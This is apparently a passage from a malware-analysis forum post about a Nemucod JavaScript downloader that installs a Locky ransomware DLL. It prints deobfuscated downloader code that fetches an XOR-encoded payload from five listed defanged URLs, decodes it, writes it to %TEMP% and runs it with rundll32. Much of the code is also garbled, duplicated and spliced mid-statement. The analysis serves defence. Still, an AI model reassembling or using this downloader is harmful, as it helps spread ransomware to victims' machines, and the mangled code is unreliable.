Io[186] = 9553;
Io[187] = 9559;
Io[18 * 10 + 8] = 9565;
Io[43 * 4 + 17] = 9564;
Io[21 * 9 + 1] = 2506 * 3 + 2045;
Io[-4034 + 4225] = 15634 - 6146;
Io[192] = 2698 * 3 + 1398;
Io[-5681 + 5874] = 9524;
Io[194] = 9516;
Io[2693 - 2498] = 9500;
Io[196] = 9472;
Io[15 * 13 + 2] = 9532;
Io[198] = 9566;
Io[199] = 9567;
Io[95 * 2 + 10] = 9562;
Io[201] = 9556;
Io[202] = 9577;
Io[1126 - 923] = 9574;
Io[69 * 2 + 66] = 9568;
Io[205] = 508 * 18 + 408;
Io[206] = 9580;
Io[-6813 + 7020] = 9575;
Io[10080 - 9872] = 9576;
Io[209] = 9572;
Io[210] = 2671 + 6902;
Io[211] = 8842 + 719;
Io[212] = 9487 + 73;
Io[5300 - 5087] = 3300 + 6254;
Io[214] = 9555;
Io[215] = 9579;
Io[216] = 9578;
Io[217] = 9496;
Io[218] = 9484;
Io[-1894 + 2113] = 9608;
Io[220] = 9604;
Io[221] = 9612;
Io[222] = 9616;
Io[6075 - 5852] = 9600;
Io[224] = 945;
Io[31 * 7 + 8] = 223;
Io[78 * 2 + 70] = 915;
Io[94 * 2 + 39] = 960;
Io[228] = 931;
Io[229] = 963;
Io[230] = -7149 + 7330;
Io[231] = 964;
Io[232] = 934;
Io[3 * 77 + 2] = 300 * 3 + 20;
Io[234] = 937;
Io[66 * 3 + 37] = 7499 - 6551;
Io[103 * 2 + 30] = 8734;
Io[2060 - 1823] = 966;
Io[238] = 949;
Io[239] = 8745;
Io[240] = 8801;
Io[9305 - 9064] = -8709 + 8886;
Io[242] = 8805;
Io[5598 - 5355] = 15170 - 6366;
Io[-950 + 1194] = 6040 + 2952;
Io[245] = 8993;
Io[7624 - 7378] = 247;
Io[247] = 8776;
Io[-8782 + 9030] = 6192 - 6016;
Io[249] = 8729;
Io[250] = 183;
Io[251] = 4944 + 3786;
Io[252] = 8319;
Io[-3209 + 3462] = 178;
Io[94 * 2 + 66] = 9632;
Io[255] = 160;
var GLq = new Array();
var Gr = "";
var Lj4;
var El;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
Lj4 = JEc3[Lp9];
if (Lj4 < (9915 - 9787)) {
El = Lj4;
} else {
El = Io[Lj4];
}
GLq.push(String[GPe8 + NEh0 + St2 + VUe5](El));
}
Gr = GLq[GPy]("");
return Gr;
};
function IGi2(Nq, JEc3) {
var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Py + DLg](Kx1(JEc3));
QAl8[KIy6 + Cz + Gh5](Nq, 2);
QAl8[Ab + TRf]();
};
You can recognize some parts :
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040
Same general method / functions
4) Differences :
- New Locky ransomware version delivered as DLL
See @Solarquest thread
Virus Alert - New Locky ransomware version delivered as DLL
- uses the ShortPath Property
=> returns the short path used by programs that require the earlier 8.3 file naming convention.
TEMP%\OOSNSG~1.DLL
Payload obfuscated / deobfuscated :TEMP%\OOSNSG~1.DLL
Sames method / functions used to deobfuscate the payload.
%TEMP%\ooSnsgsGcGgw
=> ooSnsgsGcGgw.dll if well deobfuscated
Example : "C:\Users\DardiM\AppData\Local\Temp\ooSnsgsGcGgw.dll"
With ShortPath Property :
=> TEMP%\OOSNSG~1.DLL
New part (because it uses now a dll) :%TEMP%\ooSnsgsGcGgw
=> ooSnsgsGcGgw.dll if well deobfuscated
Example : "C:\Users\DardiM\AppData\Local\Temp\ooSnsgsGcGgw.dll"
With ShortPath Property :
=> TEMP%\OOSNSG~1.DLL
if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}
=> looking for the proc architecture to call the right rundll32.exe.
'C:\WINDOWS\SysWOW64\rundll32.exe'
or
"%SystemRoot%\\system32\\rundll32.exe"
used
or
"%SystemRoot%\\system32\\rundll32.exe"
used
5) URLs :
hxxp://212.26.129.68/v07t7cb
hxxp://aquatixbottle.com/g40yg2
hxxp://realm-of-rage.heimat.eu/ut1s5
hxxp://essenciadoequilibrio.net/slfhspe
hxxp://sopranolady7.wang/2ictp
hxxp://aquatixbottle.com/g40yg2
hxxp://realm-of-rage.heimat.eu/ut1s5
hxxp://essenciadoequilibrio.net/slfhspe
hxxp://sopranolady7.wang/2ictp
6) The payload
New locky version.
run => rundll32.exe %TEMP%\OOSNSG~1.DLL,qwerty 323
Remember : => it uses the short path used by programs that require the earlier 8.3 file naming convention.
%TEMP%\OOSNSG~1.DLL
for
"%TEMP%\ooSnsgsGcGgw.dll"
As seen on my previous analysis about nemucod familly, The payload is obfuscated when downloaded , and the script uses functions to de-cipher / decode (XOR) it and make it a real dangerous file : DLL on this last version.%TEMP%\OOSNSG~1.DLL
for
"%TEMP%\ooSnsgsGcGgw.dll"
I can't re explain all the parts done to deobuscate the payload : so I put here the posts, for people that didn't read them (complete explanations, deobfuscated samples, etc)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528339
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040
It looks like the below spoiler, with some other var names
(in red the important modifications, in blue bold : the main loop)
var tab_methods = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1" ];
for (var index =0 ; index < tab_methods.length; index++) {
try {
urls_tab = [
"hxxp://212.26.129.68/v07t7cb",
"hxxp://aquatixbottle.com/g40yg2",
"hxxp://realm-of-rage.heimat.eu/ut1s5",
"hxxp://essenciadoequilibrio.net/slfhspe",
"hxxp://sopranolady7.wang/2ictp"
];
var TIk = uheprng(Math.random().toString());
var Lp9 = 1;
// Functions used
function uheprng(UFn4) {
function rawprng() {
function Mash() {
function deobfuscation(file_content) {
function is_real_exe_file(file_content) {
function ReadTextFromFile_char_substitution_1(file_path) {
function char_substitution_1(file_content) {
var ELs = new Array();
var file_content = new Array();
for (var index = 0; index < file_content.length; index++) {
function char_substitution_2(file_content) {
function WriteTextToFile_char_substitution_2(exe_file_path, file_content) {
for (var index =0 ; index < tab_methods.length; index++) {
try {
var oHttp oHttp = WScript.CreateObject](tab_methods[index]);
break;
} catch (e) {
continue;
}
};break;
} catch (e) {
continue;
}
urls_tab = [
"hxxp://212.26.129.68/v07t7cb",
"hxxp://aquatixbottle.com/g40yg2",
"hxxp://realm-of-rage.heimat.eu/ut1s5",
"hxxp://essenciadoequilibrio.net/slfhspe",
"hxxp://sopranolady7.wang/2ictp"
];
var TIk = uheprng(Math.random().toString());
var Lp9 = 1;
do {
WScript.Quit(0);var Gr = TIk(urls_tab.length); //
try {
if (oHttp.readystate < 4) {
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.open();
oStream.type = 1;
oStream.write(oHttp.responseBody);
oStream.position = 0;
oStream.saveToFile(file_path, 2);
oStream.close();
var file_content = ReadTextFromFile_char_substitution_1(file_path);
file_content = deobfuscation(file_content);
try {
oShell.Run(cmd_command_line + ",querty 323");
break;
} catch (e) {
} while (Lp9);
try {
if (1 == Lp9) {
oHttp.open("GET", urls_tab[Gr++ % urls_tab.length], false);
oHttp.send();
}oHttp.open("GET", urls_tab[Gr++ % urls_tab.length], false);
oHttp.send();
if (oHttp.readystate < 4) {
WScript.Sleep(0);
continue;
}continue;
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.open();
oStream.type = 1;
oStream.write(oHttp.responseBody);
oStream.position = 0;
oStream.saveToFile(file_path, 2);
oStream.close();
var file_content = ReadTextFromFile_char_substitution_1(file_path);
file_content = deobfuscation(file_content);
if (file_content.length < 100 * 1024 || file_content.length > 230 * 1024 || ! is_real_exe_file(file_content)) {
Lp9 = 1;
continue;
}Lp9 = 1;
continue;
try {
WriteTextToFile_char_substitution_2(exe_file_path, file_content);
} catch (e) {break;
};oShell.Run(cmd_command_line + ",querty 323");
break;
} catch (e) {
WScript.Sleep(1000);
continue;
};continue;
} while (Lp9);
// Functions used
function uheprng(UFn4) {
return (function() {
var seed = UFn4;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}var seed = UFn4;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
function rawprng() {
if (++p >= o) p = 0;
var t = (1759680 + 9183) * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | (0));
}
return random;
}());
};var t = (1759680 + 9183) * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | (0));
}
return random;
}());
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
return mash;
}var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
return mash;
function deobfuscation(file_content) {
var Nf;
var NQf6 = uheprng(753887);
for (var index = 0; index < file_content.length; index++) {
file_content[index] ^= NQf6(256);
}
var XWe = file_content[file_content.length - 4] | file_content[file_content.length- 3] << 8 | file_content[file_content.length - 2] << 16 | file_content.length - 1] << 24;
file_content.splice(file_content.length - 4, 4);
Nf = 2;
for (var index = 0; index < file_content.length; index++) {
if (Nf != XWe) {
return file_content;
};var NQf6 = uheprng(753887);
for (var index = 0; index < file_content.length; index++) {
file_content[index] ^= NQf6(256);
}
var XWe = file_content[file_content.length - 4] | file_content[file_content.length- 3] << 8 | file_content[file_content.length - 2] << 16 | file_content.length - 1] << 24;
file_content.splice(file_content.length - 4, 4);
Nf = 2;
for (var index = 0; index < file_content.length; index++) {
Nf = (Nf + file_content[index]) % 0x100000000;
};if (Nf != XWe) {
return [];
};return file_content;
function is_real_exe_file(file_content) {
if (file_content[0] == 0x4D && file_content[1] == 0x5a) { //"MZ"
};return true;
} else {
return false;
}} else {
return false;
function ReadTextFromFile_char_substitution_1(file_path) {
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset = "437;
oStream.open();
oStream.LoadFromFile(file_path);
var file_content = oStream.Readtext;
oStream.close();
return char_substitution_1(file_content);
};oStream.type = 2;
oStream.Charset = "437;
oStream.open();
oStream.LoadFromFile(file_path);
var file_content = oStream.Readtext;
oStream.close();
return char_substitution_1(file_content);
function char_substitution_1(file_content) {
var ELs = new Array();
ELs[199] = 128;
ELs[252] = 129;
...
...
ELs[8319] = 252;
ELs[178] = 253;
ELs[9632] = 254;
ELs[160] = 255;
ELs[252] = 129;
...
...
ELs[8319] = 252;
ELs[178] = 253;
ELs[9632] = 254;
ELs[160] = 255;
var file_content = new Array();
for (var index = 0; index < file_content.length; index++) {
var char_code = file_content.CharcodeAt(index);
if (char_code < 128) {
var new_char_code = char_code;
} else {
var new_char_code = ELs[char_code];
}
file_content.push(new_char_code);
};
return file_content;
};if (char_code < 128) {
var new_char_code = char_code;
} else {
var new_char_code = ELs[char_code];
}
file_content.push(new_char_code);
};
return file_content;
function char_substitution_2(file_content) {
var HFw3 = new Array();
HFw3[128] = 199;
HFw3[129] = 252;
...
...
HFw3[254] = 9632;
HFw3[255] = 160;
var Ww = new Array();
var file_content = "";
var char_code;
var new_char_code;
for (var index = 0; index < file_content.length; index++) {
char_code = file_content[index];
if (char_code < 128) {
new_char_code = HFw3[char_code];
}
file_content = Ww.join("");
return file_content;
};HFw3[128] = 199;
HFw3[129] = 252;
...
...
HFw3[254] = 9632;
HFw3[255] = 160;
var Ww = new Array();
var file_content = "";
var char_code;
var new_char_code;
for (var index = 0; index < file_content.length; index++) {
char_code = file_content[index];
if (char_code < 128) {
new_char_code = char_code;
} else {new_char_code = HFw3[char_code];
}
Ww.push(String.fromCharCode(new_char_code));
}file_content = Ww.join("");
return file_content;
function WriteTextToFile_char_substitution_2(exe_file_path, file_content) {
var oStream = WScript.CreateObject("ADODB.Stream");
oStream.type = 2;
oStream.Charset= "437" ;
oStream.open();
oStream.WriteText(char_substitution_2(file_content));
oStream.SaveToFile(exe_file_path, 2);
oStream.close();
};oStream.type = 2;
oStream.Charset= "437" ;
oStream.open();
oStream.WriteText(char_substitution_2(file_content));
oStream.SaveToFile(exe_file_path, 2);
oStream.close();
and all posts below, in the above link
Last edited: